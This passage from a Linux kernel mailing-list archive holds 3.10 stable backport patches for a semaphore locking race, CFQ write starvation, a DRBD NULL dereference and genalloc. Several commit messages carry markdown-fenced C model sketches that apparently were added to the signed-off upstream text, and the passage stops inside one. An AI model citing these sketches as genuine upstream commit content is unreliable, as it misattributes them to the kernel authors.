Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 53563d8..453da7b 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -362,7 +362,7 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
 
 /* Is this type a native word size -- useful for atomic operations */
 #ifndef __native_word
-# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+# define __native_word(t) (sizeof(t) == sizeof(char) || sizeof(t) == sizeof(short) || sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
 #endif
 
 /* Compile time object size, -1 for unknown */
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (180 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:04   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
                   ` (36 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Manfred Spraul, H. Peter Anvin, Peter Zijlstra, Davidlohr Bueso,
	Thomas Gleixner, Ingo Molnar, 1vier1, Andrew Morton,
	Linus Torvalds, Jiri Slaby, Willy Tarreau

From: Manfred Spraul <manfred@colorfullife.com>

commit 5864a2fd3088db73d47942370d0f7210a807b9bc upstream.

Commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") introduced a
race:

sem_lock has a fast path that allows parallel simple operations.
There are two reasons why a simple operation cannot run in parallel:
 - a non-simple operation is ongoing (sma->sem_perm.lock held)
 - a complex operation is sleeping (sma->complex_count != 0)

As both facts are stored independently, a thread can bypass the current
checks by sleeping in the right positions.  See below for more details
(or kernel bugzilla 105651).

The patch fixes that by creating one variable (complex_mode)
that tracks both reasons why parallel operations are not possible.

The patch also updates stale documentation regarding the locking.

With regard to stable kernels:
The patch is required for all kernels that include the
commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") (3.10?)

The alternative is to revert the patch that introduced the race.

The patch is safe for backporting, i.e. it makes no assumptions
about memory barriers in spin_unlock_wait().

Background:
Here is the race of the current implementation:

Thread A: (simple op)
- does the first "sma->complex_count == 0" test

Thread B: (complex op)
- does sem_lock(): This includes an array scan. But the scan can't
  find Thread A, because Thread A does not own sem->lock yet.
- the thread does the operation, increases complex_count,
  drops sem_lock, sleeps

Thread A:
- spin_lock(&sem->lock), spin_is_locked(sma->sem_perm.lock)
- sleeps before the complex_count test

Thread C: (complex op)
- does sem_lock (no array scan, complex_count==1)
- wakes up Thread B.
- decrements complex_count

Thread A:
- does the complex_count test

Bug:
Now both thread A and thread C operate on the same array, without
any synchronization.
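
The interleaving above can be replayed in a small single-threaded model.
This is only a sketch under stated assumptions: struct model, replay() and
the field names are illustrative and not kernel code, locks are reduced to
booleans, and no memory-ordering effects are modelled.  It compares the two
independent checks (global lock free, complex_count == 0) with the single
complex_mode flag.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of the shared state; not the kernel's sem_array. */
struct model {
	int  complex_count;	/* sleeping complex operations */
	bool global_locked;	/* stands in for sma->sem_perm.lock */
	bool complex_mode;	/* only consulted when use_complex_mode is set */
};

/*
 * Replays the A/B/C interleaving from the commit message.
 * Returns true if Thread A's fast path succeeds while Thread C
 * still holds the global lock, i.e. if the race is hit.
 */
static bool replay(bool use_complex_mode)
{
	struct model m = { 0, false, false };
	bool a_first_check, a_saw_global_free, a_fast_path;

	/* Thread A: first, unlocked check. */
	a_first_check = use_complex_mode ? !m.complex_mode
					 : (m.complex_count == 0);
	assert(a_first_check);

	/* Thread B: global lock, enter complex mode, queue itself, unlock. */
	m.global_locked = true;
	m.complex_mode = true;
	m.complex_count++;
	if (m.complex_count == 0)	/* tryleave: stays set, count != 0 */
		m.complex_mode = false;
	m.global_locked = false;

	/* Thread A: owns sem->lock, sees the global lock free, is delayed. */
	a_saw_global_free = !m.global_locked;

	/* Thread C: global lock, wakes B, decrements, keeps the lock. */
	m.global_locked = true;
	m.complex_count--;

	/* Thread A: second check. */
	if (use_complex_mode)
		a_fast_path = !m.complex_mode;
	else
		a_fast_path = a_saw_global_free && m.complex_count == 0;

	return a_fast_path && m.global_locked;
}
```

In this model replay(false) reports the race, because each of the old
checks is sampled at a moment when it happens to pass.  replay(true) does
not, because complex_mode stays set from Thread B's entry until a holder
of the global lock finds complex_count == 0 on unlock.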

[js] use set_mb instead of smp_store_mb

Fixes: 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()")
Link: http://lkml.kernel.org/r/1469123695-5661-1-git-send-email-manfred@colorfullife.com
Reported-by: <felixh@informatik.uni-bremen.de>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: <1vier1@web.de>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/sem.h |   1 +
 ipc/sem.c           | 129 ++++++++++++++++++++++++++++++----------------------
 2 files changed, 76 insertions(+), 54 deletions(-)

diff --git a/include/linux/sem.h b/include/linux/sem.h
index 976ce3a..d0efd6e 100644
--- a/include/linux/sem.h
+++ b/include/linux/sem.h
@@ -21,6 +21,7 @@ struct sem_array {
 	struct list_head	list_id;	/* undo requests on this array */
 	int			sem_nsems;	/* no. of semaphores in array */
 	int			complex_count;	/* pending complex operations */
+	bool			complex_mode;	/* no parallel simple ops */
 };
 
 #ifdef CONFIG_SYSVIPC
diff --git a/ipc/sem.c b/ipc/sem.c
index 57242be..94c6ec5 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -155,14 +155,21 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it);
 
 /*
  * Locking:
+ * a) global sem_lock() for read/write
  *	sem_undo.id_next,
  *	sem_array.complex_count,
- *	sem_array.pending{_alter,_cont},
- *	sem_array.sem_undo: global sem_lock() for read/write
- *	sem_undo.proc_next: only "current" is allowed to read/write that field.
+ *	sem_array.complex_mode
+ *	sem_array.pending{_alter,_const},
+ *	sem_array.sem_undo
  *	
+ * b) global or semaphore sem_lock() for read/write:
  *	sem_array.sem_base[i].pending_{const,alter}:
- *		global or semaphore sem_lock() for read/write
+ *	sem_array.complex_mode (for read)
+ *
+ * c) special:
+ *	sem_undo_list.list_proc:
+ *	* undo_list->lock for write
+ *	* rcu for read
  */
 
 #define sc_semmsl	sem_ctls[0]
@@ -263,24 +270,25 @@ static void sem_rcu_free(struct rcu_head *head)
 #define ipc_smp_acquire__after_spin_is_unlocked()	smp_rmb()
 
 /*
- * Wait until all currently ongoing simple ops have completed.
+ * Enter the mode suitable for non-simple operations:
  * Caller must own sem_perm.lock.
- * New simple ops cannot start, because simple ops first check
- * that sem_perm.lock is free.
- * that a) sem_perm.lock is free and b) complex_count is 0.
  */
-static void sem_wait_array(struct sem_array *sma)
+static void complexmode_enter(struct sem_array *sma)
 {
 	int i;
 	struct sem *sem;
 
-	if (sma->complex_count)  {
-		/* The thread that increased sma->complex_count waited on
-		 * all sem->lock locks. Thus we don't need to wait again.
-		 */
+	if (sma->complex_mode)  {
+		/* We are already in complex_mode. Nothing to do */
 		return;
 	}
 
+	/* We need a full barrier after seting complex_mode:
+	 * The write to complex_mode must be visible
+	 * before we read the first sem->lock spinlock state.
+	 */
+	set_mb(sma->complex_mode, true);
+
 	for (i = 0; i < sma->sem_nsems; i++) {
 		sem = sma->sem_base + i;
 		spin_unlock_wait(&sem->lock);
@@ -289,6 +297,28 @@ static void sem_wait_array(struct sem_array *sma)
 }
 
 /*
+ * Try to leave the mode that disallows simple operations:
+ * Caller must own sem_perm.lock.
+ */
+static void complexmode_tryleave(struct sem_array *sma)
+{
+	if (sma->complex_count)  {
+		/* Complex ops are sleeping.
+		 * We must stay in complex mode
+		 */
+		return;
+	}
+	/*
+	 * Immediately after setting complex_mode to false,
+	 * a simple op can start. Thus: all memory writes
+	 * performed by the current operation must be visible
+	 * before we set complex_mode to false.
+	 */
+	smp_store_release(&sma->complex_mode, false);
+}
+
+#define SEM_GLOBAL_LOCK	(-1)
+/*
  * If the request contains only one semaphore operation, and there are
  * no complex transactions pending, lock only the semaphore involved.
  * Otherwise, lock the entire semaphore array, since we either have
@@ -304,55 +334,42 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
 		/* Complex operation - acquire a full lock */
 		ipc_lock_object(&sma->sem_perm);
 
-		/* And wait until all simple ops that are processed
-		 * right now have dropped their locks.
-		 */
-		sem_wait_array(sma);
-		return -1;
+		/* Prevent parallel simple ops */
+		complexmode_enter(sma);
+		return SEM_GLOBAL_LOCK;
 	}
 
 	/*
 	 * Only one semaphore affected - try to optimize locking.
-	 * The rules are:
-	 * - optimized locking is possible if no complex operation
-	 *   is either enqueued or processed right now.
-	 * - The test for enqueued complex ops is simple:
-	 *      sma->complex_count != 0
-	 * - Testing for complex ops that are processed right now is
-	 *   a bit more difficult. Complex ops acquire the full lock
-	 *   and first wait that the running simple ops have completed.
-	 *   (see above)
-	 *   Thus: If we own a simple lock and the global lock is free
-	 *	and complex_count is now 0, then it will stay 0 and
-	 *	thus just locking sem->lock is sufficient.
+	 * Optimized locking is possible if no complex operation
+	 * is either enqueued or processed right now.
+	 *
+	 * Both facts are tracked by complex_mode.
 	 */
 	sem = sma->sem_base + sops->sem_num;
 
-	if (sma->complex_count == 0) {
+	/*
+	 * Initial check for complex_mode. Just an optimization,
+	 * no locking, no memory barrier.
+	 */
+	if (!sma->complex_mode) {
 		/*
 		 * It appears that no complex operation is around.
 		 * Acquire the per-semaphore lock.
 		 */
 		spin_lock(&sem->lock);
 
-		/* Then check that the global lock is free */
-		if (!spin_is_locked(&sma->sem_perm.lock)) {
-			/*
-			 * We need a memory barrier with acquire semantics,
-			 * otherwise we can race with another thread that does:
-			 *	complex_count++;
-			 *	spin_unlock(sem_perm.lock);
-			 */
-			ipc_smp_acquire__after_spin_is_unlocked();
+		/*
+		 * See 51d7d5205d33
+		 * ("powerpc: Add smp_mb() to arch_spin_is_locked()"):
+		 * A full barrier is required: the write of sem->lock
+		 * must be visible before the read is executed
+		 */
+		smp_mb();
 
-			/* Now repeat the test of complex_count:
-			 * It can't change anymore until we drop sem->lock.
-			 * Thus: if is now 0, then it will stay 0.
-			 */
-			if (sma->complex_count == 0) {
-				/* fast path successful! */
-				return sops->sem_num;
-			}
+		if (!smp_load_acquire(&sma->complex_mode)) {
+			/* fast path successful! */
+			return sops->sem_num;
 		}
 		spin_unlock(&sem->lock);
 	}
@@ -372,15 +389,16 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
 		/* Not a false alarm, thus complete the sequence for a
 		 * full lock.
 		 */
-		sem_wait_array(sma);
-		return -1;
+		complexmode_enter(sma);
+		return SEM_GLOBAL_LOCK;
 	}
 }
 
 static inline void sem_unlock(struct sem_array *sma, int locknum)
 {
-	if (locknum == -1) {
+	if (locknum == SEM_GLOBAL_LOCK) {
 		unmerge_queues(sma);
+		complexmode_tryleave(sma);
 		ipc_unlock_object(&sma->sem_perm);
 	} else {
 		struct sem *sem = sma->sem_base + locknum;
@@ -540,6 +558,7 @@ static int newary(struct ipc_namespace *ns, struct ipc_params *params)
 	}
 
 	sma->complex_count = 0;
+	sma->complex_mode = true; /* dropped by sem_unlock below */
 	INIT_LIST_HEAD(&sma->pending_alter);
 	INIT_LIST_HEAD(&sma->pending_const);
 	INIT_LIST_HEAD(&sma->list_id);
@@ -2165,10 +2184,10 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 	/*
 	 * The proc interface isn't aware of sem_lock(), it calls
 	 * ipc_lock_object() directly (in sysvipc_find_ipc).
-	 * In order to stay compatible with sem_lock(), we must wait until
-	 * all simple semop() calls have left their critical regions.
+	 * In order to stay compatible with sem_lock(), we must
+	 * enter / leave complex_mode.
 	 */
-	sem_wait_array(sma);
+	complexmode_enter(sma);
 
 	sem_otime = get_semotime(sma);
 
@@ -2185,6 +2204,8 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 		   sem_otime,
 		   sma->sem_ctime);
 
+	complexmode_tryleave(sma);
+
 	return 0;
 }
 #endif
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (181 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
                   ` (35 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Glauber Costa, Jens Axboe, linux-block, Jens Axboe, Willy Tarreau

From: Glauber Costa <glauber@scylladb.com>

commit 3932a86b4b9d1f0b049d64d4591ce58ad18b44ec upstream.

While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.

The problem seems to happen because XFS may block on pending metadata updates
under certain circumstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):

    ffffffffb90c57b1 finish_task_switch
    ffffffffb97dffb5 schedule
    ffffffffb97e310c schedule_timeout
    ffffffffb97e1f12 __down
    ffffffffb90ea821 down
    ffffffffc046a9dc xfs_buf_lock
    ffffffffc046abfb _xfs_buf_find
    ffffffffc046ae4a xfs_buf_get_map
    ffffffffc046babd xfs_buf_read_map
    ffffffffc0499931 xfs_trans_read_buf_map
    ffffffffc044a561 xfs_da_read_buf
    ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
    ffffffffc0452b90 xfs_dir2_leaf_lookup_int
    ffffffffc0452e0f xfs_dir2_leaf_lookup
    ffffffffc044d9d3 xfs_dir_lookup
    ffffffffc047d1d9 xfs_lookup
    ffffffffc0479e53 xfs_vn_lookup
    ffffffffb925347a path_openat
    ffffffffb9254a71 do_filp_open
    ffffffffb9242a94 do_sys_open
    ffffffffb9242b9e sys_open
    ffffffffb97e42b2 entry_SYSCALL_64_fastpath
    00007fb0698162ed [unknown]

Inspecting my run with blktrace, I can see that the xfsaild kthread exhibits very
high "Dispatch wait" times, in the range of dozens of seconds and consistent with
the open() times I saw in that run.

Still in the blktrace output, after searching a bit, we can identify the
request that wasn't dispatched:

  8,0   11      152    81.092472813   804  A  WM 141698288 + 8 <- (8,1) 141696240
  8,0   11      153    81.092472889   804  Q  WM 141698288 + 8 [xfsaild/sda1]
  8,0   11      154    81.092473207   804  G  WM 141698288 + 8 [xfsaild/sda1]
  8,0   11      206    81.092496118   804  I  WM 141698288 + 8 (   22911) [xfsaild/sda1]
  <==== 'I' means Inserted (into the IO scheduler) ===================================>
  8,0    0   289372    96.718761435     0  D  WM 141698288 + 8 (15626265317) [swapper/0]
  <==== Only 15s later the CFQ scheduler dispatches the request ======================>

As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):

  8,0    1        0    81.117912979     0  m   N cfq1618SN / insert_request
  8,0    1        0    81.117913419     0  m   N cfq1618SN / add_to_rr
  8,0    1        0    81.117914044     0  m   N cfq1618SN / preempt
  8,0    1        0    81.117914398     0  m   N cfq767A  / slice expired t=1
  8,0    1        0    81.117914755     0  m   N cfq767A  / resid=40
  8,0    1        0    81.117915340     0  m   N / served: vt=1948520448 min_vt=1948520448
  8,0    1        0    81.117915858     0  m   N cfq767A  / sl_used=1 disp=0 charge=0 iops=1 sect=0

where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.

The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.

Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.

Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.

When the queue itself calls cfq_may_dispatch(), it can bail out if it sees SYNC
requests in flight. An incoming request from another queue can also preempt it
in such a situation before we have the chance to execute anything (as seen in the
trace above).

This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired).

Care is taken during preempt to still allow rt requests to preempt us
regardless.
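
The effect of the flag on the two decisions can be sketched with a reduced
model.  Assumptions: struct queue_model and both helpers are hypothetical
names, and the "remaining checks" in may_dispatch() are collapsed to the
single sync-in-flight test mentioned above; the real functions consider
more state (including the rt case, which is left out here).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, reduced view of a CFQ queue; field names are illustrative. */
struct queue_model {
	bool is_sync;		/* queue carries synchronous requests */
	bool must_dispatch;	/* set when the head request is fifo-expired */
	bool sync_in_flight;	/* other queues have SYNC requests in flight */
};

/* Mirrors the early return added to cfq_may_dispatch(). */
static bool may_dispatch(const struct queue_model *q)
{
	assert(q != NULL);

	if (q->must_dispatch)
		return true;

	/* Simplified stand-in: an async queue waits for in-flight sync IO. */
	return q->is_sync || !q->sync_in_flight;
}

/* Mirrors the changed sync-over-async condition in cfq_should_preempt(). */
static bool sync_request_preempts(const struct queue_model *active,
				  bool new_rq_is_sync)
{
	assert(active != NULL);

	return new_rq_is_sync && !active->is_sync && !active->must_dispatch;
}
```

With must_dispatch clear, an async queue facing in-flight sync IO neither
dispatches nor resists preemption; with it set, both answers flip, which
is what lets one expired request through.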

Testing my workload with this patch applied produces much better results.
From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:

Latency histogram of xfs_buf_lock acquisition (microseconds):
 value |-------------------------------------------------- count
     0 |                                                     11
     1 |@@@@                                                161
     2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  1966
     4 |@                                                    54
     8 |                                                     36
    16 |                                                      7
    32 |                                                      0
    64 |                                                      0
       ~
  1024 |                                                      0
  2048 |                                                      0
  4096 |                                                      1
  8192 |                                                      1
 16384 |                                                      2
 32768 |                                                      0
 65536 |                                                      0
131072 |                                                      1
262144 |                                                      0
524288 |                                                      0

Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 block/cfq-iosched.c | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/block/cfq-iosched.c b/block/cfq-iosched.c
index 69111c5..ddb0ebb 100644
--- a/block/cfq-iosched.c
+++ b/block/cfq-iosched.c
@@ -2812,7 +2812,6 @@ static struct request *cfq_check_fifo(struct cfq_queue *cfqq)
 	if (time_before(jiffies, rq_fifo_time(rq)))
 		rq = NULL;
 
-	cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq);
 	return rq;
 }
 
@@ -3186,6 +3185,9 @@ static bool cfq_may_dispatch(struct cfq_data *cfqd, struct cfq_queue *cfqq)
 {
 	unsigned int max_dispatch;
 
+	if (cfq_cfqq_must_dispatch(cfqq))
+		return true;
+
 	/*
 	 * Drain async requests before we start sync IO
 	 */
@@ -3277,15 +3279,20 @@ static bool cfq_dispatch_request(struct cfq_data *cfqd, struct cfq_queue *cfqq)
 
 	BUG_ON(RB_EMPTY_ROOT(&cfqq->sort_list));
 
+	rq = cfq_check_fifo(cfqq);
+	if (rq)
+		cfq_mark_cfqq_must_dispatch(cfqq);
+
 	if (!cfq_may_dispatch(cfqd, cfqq))
 		return false;
 
 	/*
 	 * follow expired path, else get first next available
 	 */
-	rq = cfq_check_fifo(cfqq);
 	if (!rq)
 		rq = cfqq->next_rq;
+	else
+		cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq);
 
 	/*
 	 * insert request into driver dispatch list
@@ -3794,7 +3801,7 @@ cfq_should_preempt(struct cfq_data *cfqd, struct cfq_queue *new_cfqq,
 	 * if the new request is sync, but the currently running queue is
 	 * not, let the sync request have priority.
 	 */
-	if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq))
+	if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq) && !cfq_cfqq_must_dispatch(cfqq))
 		return true;
 
 	if (new_cfqq->cfqg != cfqq->cfqg)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (182 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
                   ` (34 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Richard Weinberger, viro, christoph.lechleitner, wolfgang.glas,
	Lars Ellenberg, Jens Axboe, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.

Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.

DRBD as an external module was already around in the kernel 2.4 days.
We used to be compatible with 2.4 and very early 2.6 kernels;
we used to use
 rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
 rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
 rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);

tcp_sendmsg() used to totally ignore the size parameter.
 57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
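
A userspace sketch of why the size argument matters once it is honoured.
Assumptions: struct buf_vec, fake_send() and send_all() are hypothetical
stand-ins, and the loop is assumed to advance the vector after a short
send, so that on a retry the vector describes fewer bytes than the
original size.  fake_send() returns -1 where the real code would walk past
the single vector.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a single I/O vector; not struct kvec. */
struct buf_vec {
	const char *base;
	size_t len;
};

/*
 * Hypothetical transport: sends at most max_chunk bytes per call.
 * Returns -1 when asked for more bytes than the vector describes.
 */
static long fake_send(const struct buf_vec *v, size_t len, size_t max_chunk)
{
	if (len > v->len)
		return -1;
	return (long)(len < max_chunk ? len : max_chunk);
}

/* Sends size bytes; pass_remaining selects the fixed (1) or old (0) call. */
static long send_all(const char *data, size_t size, size_t max_chunk,
		     int pass_remaining)
{
	struct buf_vec v = { data, size };
	size_t sent = 0;

	assert(max_chunk > 0);	/* otherwise the loop would never finish */

	while (sent < size) {
		long rv = fake_send(&v, pass_remaining ? v.len : size,
				    max_chunk);

		if (rv < 0)
			return -1;
		sent += (size_t)rv;
		v.base += rv;		/* advance past what was sent */
		v.len -= (size_t)rv;
	}
	return (long)sent;
}
```

The old form only goes wrong after a short send, which matches the "rv <
size" condition above: when everything goes out in one call the two forms
behave the same.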

Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time".  Apparently that was unlikely enough for most, so this went
unnoticed for years.

Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/

This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.

It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).

It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().

Fixes: b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/block/drbd/drbd_main.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
index a5dca6a..776fc08 100644
--- a/drivers/block/drbd/drbd_main.c
+++ b/drivers/block/drbd/drbd_main.c
@@ -1771,7 +1771,7 @@ int drbd_send(struct drbd_tconn *tconn, struct socket *sock,
  * do we need to block DRBD_SIG if sock == &meta.socket ??
  * otherwise wake_asender() might interrupt some send_*Ack !
  */
-		rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
+		rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
 		if (rv == -EAGAIN) {
 			if (we_should_drop_the_connection(tconn, sock))
 				break;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (183 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
                   ` (33 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Mentz, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Daniel Mentz <danielmentz@google.com>

commit 62e931fac45b17c2a42549389879411572f75804 upstream.

gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.

The shortcut

	if (size > atomic_read(&chunk->avail))
		continue;

makes the loop skip over chunks that do not have enough bytes left to
fulfill the request.  There are two situations, though, where an
allocation might still fail:

(1) The available memory is not contiguous, i.e.  the request cannot
    be fulfilled due to external fragmentation.

(2) A race condition.  Another thread runs the same code concurrently
    and is quicker to grab the available memory.

In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed.  This return value is then assigned to
start_bit.  The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched.  Today, the code fails to reset start_bit to 0.  As a
result, prefixes of subsequent chunks are ignored.  Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
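
The stale start_bit can be reproduced in a small model.  Assumptions:
struct chunk_model, find_free_run() and alloc_model() are illustrative
names, one byte stands for one bitmap bit, every chunk has CHUNK_BITS
bits, and the avail shortcut and the retry path are left out.

```c
#include <assert.h>

#define CHUNK_BITS 8

/* Hypothetical chunk: one byte per bitmap bit, 1 = in use. */
struct chunk_model {
	unsigned char bits[CHUNK_BITS];
};

/* First-fit search in [start, end); returns end when no run of nbits fits. */
static int find_free_run(const unsigned char *bits, int end, int start,
			 int nbits)
{
	int i, run = 0;

	for (i = start; i < end; i++) {
		run = bits[i] ? 0 : run + 1;
		if (run == nbits)
			return i - nbits + 1;
	}
	return end;
}

/*
 * Returns chunk index * CHUNK_BITS + bit offset, or -1 on failure.
 * reset_start selects the fixed (1) or old (0) behaviour.
 */
static int alloc_model(struct chunk_model *chunks, int nchunks, int nbits,
		       int reset_start)
{
	int c, i, start_bit = 0, end_bit;

	assert(nbits > 0 && nbits <= CHUNK_BITS);

	for (c = 0; c < nchunks; c++) {
		if (reset_start)
			start_bit = 0;
		end_bit = CHUNK_BITS;
		start_bit = find_free_run(chunks[c].bits, end_bit, start_bit,
					  nbits);
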